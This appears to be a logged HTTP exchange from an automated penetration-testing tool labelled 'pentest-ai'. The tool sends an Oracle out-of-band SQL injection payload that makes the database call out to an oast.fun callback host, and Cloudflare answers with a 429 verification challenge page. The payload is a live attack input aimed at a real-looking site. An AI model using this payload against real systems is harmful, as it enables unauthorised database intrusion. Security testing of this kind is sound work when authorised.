REQUEST:
GET https://my.myfirst.tech/search?user=%27%20%7C%7C%20%28SELECT%20UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0z3fvpuvikk9r5o.oast.fun%27%29%20FROM%20dual%29%20%7C%7C%20%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9772
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84757ba69a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=RTMGQLpzDeCuvCFriJFEGqHnmIy7GpputkL%2BSkrd%2BVUu6v9IbYH75PT0q5csTm8yRX6M4g1bIyn0qgHic6GOKoBh2S%2FjdkzVCEqPE%2FWr1K6aYrGU93NOf9lAiTX2WYMI0K8bQ1LKvya%2BDp0%2BRw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84757ba69a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'kxotuVWcQL69XQkpU.4tSEWmML0JkuQBe9J92x9fkQ0-1784281158-1.2.1.1-vxxyckEpJ6EiQ_JyCfoqCm7QO5mDIYw8irUqwAvQxm6LwWeR8r960axawAgmPs6f',cITimeS: '1784281158',cRay: 'a1c84757ba69a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?user=%27+%7C%7C+%28SELECT+UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0z3fvpuvikk9r5o.oast.fun%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_tk=xls4v4qbHkD3yGwFOPwg1huey1EW47KoFUqlFfLGw0U-1784281158-1.0.1.1-bm7U99oxHTy4B8Q8wAvHHZhQ.zPNo4bx6w4Ftqrpi5s",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?user=%27+%7C%7C+%28SELECT+UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0z3fvpuvikk9r5o.oast.fun%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_f_tk=xls4v4qbHkD3yGwFOPwg1huey1EW47KoFUqlFfLGw0U-1784281158-1.0.1.1-bm7U99oxHTy4B8Q8wAvHHZhQ.zPNo4bx6w4Ftqrpi5s",md: '4j6YxGDU1r41IX5bYsLk4p_YNqTM0_xAO2sQckoBas8-1784281158-1.2.1.1-JQ2u2crjrz9UtIQnJQQbNRFhA6Q9lmTH8Vxw0oSwG6Xlug_S5PUQIyy7uj20X3p9QKWJf0ioCekbauL4YXYMJ2WfikFzQVxI5Ze4OFaYwFPGjNz1xizZiMk4R_sQ.qUC9hw_6YvbazWvZPg26aDviur7FWl8AExkeFOOQ2tDW6WD8syB_7aZH1De.g2S3asOXQSTLRQVstLNcCusXZkCAiDSiOvl_cKqaXjz.ExOakOTjr.ho_of9nwCpMamoK01zErOGm4WP9Nmik42Va8yjIjBjAKWyjvnmB6qtLuspR1CosHoAd0ONpfr2EEh6SVXogcw6OjTXVws_ZVa4p.dDmlHF.iLmJZmA6EJrAuIYYHprR0IHoYIx4WojQ6.53iFoqLLmoLwdGhaeMj.ch36InEjqT4urjrZ0Y0KWH0iIRMqBgp85DWn6aukwxRvW9xnyS0U8HhQKlKpBE6X0ddQdImv1DuT1mvEjTAUecte9oPhdd_.yG4a0rgskOZ6QjGRol1oNnib5yWDWcGJJA0STggTaH4zff5Lq8l5GYp4z8OaBI6gb9oocNVOs.rw15JSqEQbHP0jlf6Rfy2zLduhg60wl4OOvvJkDuWg4ggLIqj8T.1sygEvWs08OXAjn6Y84tBATRlQ1uI2pYhWiEMn65bhy9QMXg4aw366hENx.3Xjpu149LxTXjcS3BTGwIEaorQz3e0DNK2Dj.nrTUQAa2kV8ZWroY.wTxRXIr9SS_P1YcMAcw0sB5GfiM1JHMIrFB0NcaRzVJbMLDFRKuBVp1umM8Y.828V39p4VpDPd0JKS1rpcYudnptJtqVGlj_WLCQqcjjKIUxf6e4q5xSSkVrN1EsV933BeW9m5JOyeXfk0dr3glT3KShjm.R8RwoECuwvIJlqj7utgHQ58cYf0fn6UGQPyDjz8Wldg9WWcMT31ZLBQ5qiZMcEim_qXJ8.L9lBPshcMvfP25a2r33_Cn_LO.iP2pHL0jSQGJkRT_dp2l8P5pxOSGZJWl5LYXJdtUdU1pBrgUX0eD3E9_U5iApl_kBCS3ERWIyOjj2jRVBGw.ZQYi67JqXq7BhFhrhozR8CKh_vK3qxpSNUX5z2cAPxV_u88VGf7UYO5LVtRUU292qL9kn2NrSNah5MU_3TVDvw1rbv1LISqK.zcFbnOqxqnT3S3CpRLBPTxcqF1DBdn37vc5b1WZWpCz12nGA2Bi1gOX_.5Jz82aDyGpi8wRdYdXa3KhaPR.OaJQmotMUanfMNn0BpGyAHFo.wh8jiEyxVCMf.EUcnxFaum3437NcPm0WcsrKQApnfPSZsquw8tevfFfVSpwgTxrUtg6OT',mdrd: 'fRAhmSnjRcEdAJNxMtMTcOQ9mIfPNP8RgxQUmZz3xEU-1784281158-1.2.1.1-sPckZ9y5fuD6p.ymbMzWE_46IvlQzVqFvO0Jz.Eh5u.sI0c8aZoygo2rfvb0UcDBuK0PalorCk0pIWn8fXte3wHJeLnvZPkp7ju2PzeoCZ3iu5Gz29WH.7n_hxsXRieeS.F5rJWyf2PT38Ap4b_moA5U3Cpw.MF0f9N1scIe4QMzjbPnqUkAGuq9yjntTK2dWKD2zAmYF00sanJsbdZF6UE86iH4CpvVPHUeoDBPYzIZ2nBwPUNJ6C1wypfKPyvF',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84757ba69a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?user=%27+%7C%7C+%28SELECT+UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0z3fvpuvikk9r5o.oast.fun%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_rt_tk=xls4v4qbHkD3yGwFOPwg1huey1EW47KoFUqlFfLGw0U-1784281158-1.0.1.1-bm7U99oxHTy4B8Q8wAvHHZhQ.zPNo4bx6w4Ftqrpi5s"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
